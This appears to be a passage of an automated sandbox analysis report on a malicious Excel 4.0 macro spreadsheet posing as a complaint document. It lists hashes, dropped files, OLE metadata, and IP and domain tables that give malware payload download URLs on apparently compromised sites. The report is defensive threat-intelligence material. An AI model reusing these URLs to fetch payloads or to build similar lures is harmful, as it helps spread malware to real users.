                        Classification:mal84.expl.evad.winXLS@11/13@6/4
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xls
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Found warning dialog
                        • Click Ok
                        • Found warning dialog
                        • Click Ok
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 91.199.212.52, 2.20.142.209, 2.20.142.210
                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, crt.usertrust.com, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, au-bg-shim.trafficmanager.net
                        • Report size getting too big, too many NtDeviceIoControlFile calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

IPs

Match / Associated Sample Name | Detection | Context
162.241.80.6
  Complaint-447781983-02182021.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44250601302777800000.dat
  Complaint-447781983-02182021.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | pathinanchilearthmovers.com/eznwcdhx/44245955293750000000.dat
138.36.237.100
  Complaint-447781983-02182021.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44250601302777800000.dat
  Complaint-447781983-02182021.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | jugueterialatorre.com.ar/xjzpfwc/44245955293750000000.dat
  CompensationClaim-46373845-02032021.xls | malicious | jugueteriaelgato.com.ar/zsrrq/416212.jpg
  CompensationClaim-46373845-02032021.xls | malicious | jugueteriaelgato.com.ar/zsrrq/416212.jpg
  CompensationClaim-1245593270-02032021.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
  CompensationClaim-1245593270-02032021.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
  fp5H5ulYUE5566sbSLC2.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
  fp5H5ulYUE5566sbSLC2.xls | malicious | loonytoys.com.ar/rqksqzjvcmv/416212.jpg
68.66.216.42
  Complaint-447781983-02182021.xls | malicious | biblicalisraeltours.com/otmchxmxeg/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | biblicalisraeltours.com/otmchxmxeg/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | biblicalisraeltours.com/otmchxmxeg/44245955293750000000.dat
  ac6e58332e379d0712d36c5c83985c42.xls | malicious | biblicalisraeltours.com/ivqcapzu/987298.jpg
  ac6e58332e379d0712d36c5c83985c42.xls | malicious | biblicalisraeltours.com/ivqcapzu/987298.jpg
72.52.227.180
  Complaint-447781983-02182021.xls | malicious | rzminc.com/fdzgprclatqo/44250601302777800000.dat
  Complaint-447781983-02182021.xls | malicious | rzminc.com/fdzgprclatqo/44250596245254600000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | rzminc.com/fdzgprclatqo/44245960229745400000.dat
  SecuriteInfo.com.Heur.10413.xls | malicious | rzminc.com/fdzgprclatqo/44245955293750000000.dat

                        Domains

Match / Associated Sample Name or URL | Detection | Context
biblicalisraeltours.com
  Complaint-447781983-02182021.xls | malicious | 68.66.216.42
  SecuriteInfo.com.Heur.10413.xls | malicious | 68.66.216.42
  SecuriteInfo.com.Heur.10413.xls | malicious | 68.66.216.42
  ac6e58332e379d0712d36c5c83985c42.xls | malicious | 68.66.216.42
  ac6e58332e379d0712d36c5c83985c42.xls | malicious | 68.66.216.42
crt.sectigo.com
  Complaint-447781983-02182021.xls | malicious | 91.199.212.52
  Complaint-447781983-02182021.xls | malicious | 91.199.212.52
  CorpReport.exe | malicious | 91.199.212.52
  sys.dll | malicious | 91.199.212.52
  CorpReport.exe | malicious | 91.199.212.52
  CorpReport.exe | malicious | 91.199.212.52
  ReportCorp.exe | malicious | 91.199.212.52
  1S0a576pAR.exe | malicious | 91.199.212.52
  NJx63jHebE.exe | malicious | 91.199.212.52
  EmployeeComplaintReport.exe | malicious | 91.199.212.52
  ct.dll | malicious | 91.199.212.52
  CompensationClaim-46373845-02032021.xls | malicious | 91.199.212.52
  CompensationClaim-46373845-02032021.xls | malicious | 91.199.212.52
  documents.doc | malicious | 91.199.212.52
  ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.doc | malicious | 91.199.212.52
  N.11389944 BS 05 gen 2021.doc | malicious | 91.199.212.52
  PSX7103491.doc | malicious | 91.199.212.52
  Beauftragung.doc | malicious | 91.199.212.52
  #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.doc | malicious | 91.199.212.52
  https://emailcpcc-my.sharepoint.com:443/:b:/g/personal/aswania0_email_cpcc_edu/ESAvfBZdvHBMvBJK1bnZfsoBXf5RRY-PIqJk-UtmqkDXjQ?e=4%3auSHA5p&at=9&d=DwMBaQ | malicious | 91.199.212.52
rzminc.com
  Complaint-447781983-02182021.xls | malicious | 72.52.227.180
  Complaint-447781983-02182021.xls | malicious | 72.52.227.180
  SecuriteInfo.com.Heur.10413.xls | malicious | 72.52.227.180
  SecuriteInfo.com.Heur.10413.xls | malicious | 72.52.227.180

                        ASN


                        JA3 Fingerprints


                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1559
                        Entropy (8bit):7.399832861783252
                        Encrypted:false
                        SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                        MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                        SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                        SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                        SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                        Category:dropped
                        Size (bytes):59134
                        Entropy (8bit):7.995450161616763
                        Encrypted:true
                        SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                        MD5:E92176B0889CC1BB97114BEB2F3C1728
                        SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                        SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                        SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0968A1E3A40D2582E7FD463BAEB59CD
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):1413
                        Entropy (8bit):7.480496427934893
                        Encrypted:false
                        SSDEEP:24:yYvJm3RW857Ij3kTteTuQRFjGgZLE5XBy9+JYSE19rVAVsGnyI3SKB7:PL854TTuQL/ZoXQ9+mrGVrb3R
                        MD5:285EC909C4AB0D2D57F5086B225799AA
                        SHA1:D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
                        SHA-256:68B9C761219A5B1F0131784474665DB61BBDB109E00F05CA9F74244EE5F5F52B
                        SHA-512:4CF305B95F94C7A9504C53C7F2DC8068E647A326D95976B7F4D80433B2284506FC5E3BB9A80A4E9A9889540BBF92908DD39EE4EB25F2566FE9AB37B4DC9A7C09
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):282
                        Entropy (8bit):3.12972515711339
                        Encrypted:false
                        SSDEEP:3:kkFklynWyE/XfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKrn1E/qjXxp9jKFlIaYM2+/LOjA/
                        MD5:854A030C3464773C334B42C2A583E11A
                        SHA1:CAF4D2F1740F7BB87A98ACEEB27D04485BD5B255
                        SHA-256:D7A0B754884001039686354200AD9EFA1D4F5FCD36F4B6E86F24AB82D9A29764
                        SHA-512:6838CBD3F15073557501B9575341CBE33222C00F5E886E1565CE6EC04495DEE9F38CB524929D1AD8479AE83C0078F78C806F08EDFE77101518A3DEA89B517337
                        Malicious:false
                        Reputation:low
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):328
                        Entropy (8bit):3.090852246460565
                        Encrypted:false
                        SSDEEP:6:kK9fpbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:Vfw3kPlE99SNxAhUeo+aKt
                        MD5:03F4FE715EC177431092518DEDEC2105
                        SHA1:7AB48FD7D5BE49668DF301820AABA734A3C821BB
                        SHA-256:63CAFAC0A1BF3DD49E0691169209E115ABB992851A02D81F19C0532C5978F6E5
                        SHA-512:F596DFA694E9F8ADE1A3F1FCA470E73B6E21D877EC3A0B4B70FD0CDFAE04EEBB41374E3D7CA3C870D02EC1324B2AC4A84FFC20EF38338EB18F507BFD0DA24054
                        Malicious:false
                        Reputation:low
                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0968A1E3A40D2582E7FD463BAEB59CD
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):250
                        Entropy (8bit):2.977287375524799
                        Encrypted:false
                        SSDEEP:3:kkFklNlP9/XfllXlE/lQcjT18tlwiANjpU+plgh3VEkax3QbaLU15lqErtd9lytn:kKk9/qQAbjMulgokaWbLOW+n
                        MD5:895704621DE30F18E9C830F1A0E2B7B4
                        SHA1:112CE89AEC27FE8EB0C693DF6D630CE07CC0EC5B
                        SHA-256:0F65DA1C7A911D53DCA674FB0EF9FABDD9ED875BC94E2E5B0D506F42FC87A944
                        SHA-512:0F0F54264ED2325919320633CFD5B53AF2FBDAA813F109CF5FA574FE3103E59F893E1BFC5C9CEFC6757E5110F89E435E77AB8DFCD2628792A12ADB3F82AAF739
                        Malicious:false
                        Reputation:low
                        C:\Users\user\AppData\Local\Temp\95DE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):31752
                        Entropy (8bit):7.6478387604130065
                        Encrypted:false
                        SSDEEP:768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/VHct:TQWMHNffMaFT9i
                        MD5:0CBEB72487F44A6B17B875FF892D6E52
                        SHA1:2C39127265E91516D1FDBE952E112BFB91800F44
                        SHA-256:408FDE2152A6C51A3B76239040ACC0390D815686E3B20AFB2BE458E5E809617C
                        SHA-512:C99BD12332BDDA57ABC5EA45EEA4665B4F93246BBB4D82278C90B80611FE66823CC2963E865B41F1D820097B5E2D19E044946E992C9B4F02C3B68F34292C11D5
                        Malicious:false
                        C:\Users\user\AppData\Local\Temp\CabEE94.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                        Category:dropped
                        Size (bytes):59134
                        Entropy (8bit):7.995450161616763
                        Encrypted:true
                        SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                        MD5:E92176B0889CC1BB97114BEB2F3C1728
                        SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                        SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                        SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                        Malicious:false
                        Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                        C:\Users\user\AppData\Local\Temp\TarEE95.tmp
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):152788
                        Entropy (8bit):6.316654432555028
                        Encrypted:false
                        SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                        MD5:64FEDADE4387A8B92C120B21EC61E394
                        SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                        SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                        SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                        Malicious:false
                        Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-1992179913-02182021.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Feb 23 22:49:40 2021, atime=Tue Feb 23 22:49:40 2021, length=57856, window=hide
                        Category:dropped
                        Size (bytes):2218
                        Entropy (8bit):4.495765973363477
                        Encrypted:false
                        SSDEEP:48:8p/XT0jF4hF0ZtFFRMQh2p/XT0jF4hF0ZtFFRMQ/:8p/XojF4zE/FRMQh2p/XojF4zE/FRMQ/
                        MD5:42F80CBD3DCDA3D663F6C7E32B72F474
                        SHA1:C460FF502E75EDF28ED330E303EC22B4058D3DF7
                        SHA-256:9EDB612EC602B219EB451D4A131320AEAE7D68D586E4D33D30CBB16D8B47095F
                        SHA-512:23C30C244F28B8B77984772E24094FF5474F48508AD3E4EE77D80CF0A7F6E742ECA4CBB5912678890F7709CE07E29BF5ADDA2451197E357E605BAE03A25C0126
                        Malicious:false
                        Preview: L..................F.... ...[.v..{.....>...I...>................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WR1. .COMPLA~1.XLS..p.......Q.y.Q.y*...8.....................C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\Complaint-1992179913-02182021.xls.8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.1.9.9.2.1.7.9.9.1.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 22:49:40 2021, atime=Tue Feb 23 22:49:40 2021, length=8192, window=hide
                        Category:dropped
                        Size (bytes):867
                        Entropy (8bit):4.482199419348991
                        Encrypted:false
                        SSDEEP:12:85Qt4FKLgXg/XAlCPCHaXtB8XzB/KkcX+WnicvbASbDtZ3YilMMEpxRljKQgTdJU:85JC/XTd6j8YeM+Dv3qRMrNru/
                        MD5:2F74E7C64915C3397C972A3F62CA5915
                        SHA1:54048D9D3C228FD9E93512CC4990D2F5B77FC02E
                        SHA-256:708E59D9A803D9504AF334A5BA56F5C3B977107A3278E3DC6D48B19E0FB0826B
                        SHA-512:6B9779D6E95CB19D90C66556EF33FFEB1D2AA14812908180D70530C656B1595E4E3C763216A2C99BCFF64E664548F5F6B2EBF0EAF5C8D08D7962B0527F627317
                        Malicious:false
                        Preview: L..................F...........7G.....>......>.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WR5...Desktop.d......QK.XWR5.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):140
                        Entropy (8bit):4.6378923533221235
                        Encrypted:false
                        SSDEEP:3:oyBVomMYlIFc7FXrl+1lIFc7FXrlmMYlIFc7FXrlv:dj6YlycZbalycZbxYlycZb1
                        MD5:6A7B4C954CE096AD8FDAA29641236A8C
                        SHA1:B2DE2B101CC2101D13B8D16AC9FD4253D0E14E24
                        SHA-256:BCF555F9537B00AF4CF501AB4F2D527AEB8246C9970AD4F8BD0B9256C8CBCB04
                        SHA-512:5D53F0C0E26DE11674231EC28C2F0EB0E7E7F80CAEF298E5BA47BDAEA23021D2DA30DCE0772FEA55ADF6F59B99D1B1A2C3688268F73DF0189D52DC64E29F7E86
                        Malicious:false
                        Preview: Desktop.LNK=0..[xls]..Complaint-1992179913-02182021.LNK=0..Complaint-1992179913-02182021.LNK=0..[xls]..Complaint-1992179913-02182021.LNK=0..
                        C:\Users\user\Desktop\76DE0000
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Applesoft BASIC program data, first line number 16
                        Category:dropped
                        Size (bytes):88220
                        Entropy (8bit):6.550018613106071
                        Encrypted:false
                        SSDEEP:1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxdrfsjoaGzeNTrjQaGzeNTHcYVRDZKS:rP8rmjAItyzElBIL6lECbgBGGP5xLm7S
                        MD5:F7131FFF9A829328EC88D57AE6838B12
                        SHA1:3DBB0B17BA212B188B7436575DA56A98D580770F
                        SHA-256:D6E73D03E6A43DD4E0E6C06D368BF56BA3BEFDACCBD528F530C7E965986421AF
                        SHA-512:04291DA4AD4461114D47CD7D1CA1CC8D2128739B87E0C72FA4EF74B426C1E2ADA9BD78C22A8FA1352D38F9AB8ED8175E5EE811148397E5F480C3722EA336D76C
                        Malicious:false
                        Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                        Static File Info

                        General

                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                        Entropy (8bit):3.697666945848156
                        TrID:
                        • Microsoft Excel sheet (30009/1) 78.94%
                        • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                        File name:Complaint-1992179913-02182021.xls
                        File size:145920
                        MD5:b2c46df91cfe891f61af65277461b32b
                        SHA1:fd329e179663a40c31f5c567228a59349928a6a5
                        SHA256:3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
                        SHA512:809890b32a5f370054043a5abbbffdb45e1b1bf5e8f781d2f5537e26b9c5a171c450559e731ec6bbc5b798f3a131e94bb9f06d3523e7a362182b035203a6fcbb
                        SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/9:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOM0
                        File Content Preview:........................>......................................................................................................................................................................................................................................

                        File Icon

                        Icon Hash:e4eea286a4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "Complaint-1992179913-02182021.xls"

                        Indicators

                        Has Summary Info:True
                        Application Name:Microsoft Excel
                        Encrypted Document:False
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:True

                        Summary

                        Code Page:1251
                        Author:
                        Last Saved By:Friner
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2021-02-18 13:42:21
                        Creating Application:Microsoft Excel
                        Security:0

                        Document Summary

                        Document Code Page:1251
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False

                        Streams

                        Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.321292606979
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                        General
                        Stream Path:\x5SummaryInformation
                        File Type:data
                        Stream Size:4096
                        Entropy:0.2746714277
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                        Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085
                        General
                        Stream Path:Book
                        File Type:Applesoft BASIC program data, first line number 8
                        Stream Size:135085
                        Entropy:3.69042254796
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                        Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                        Macro 4.0 Code

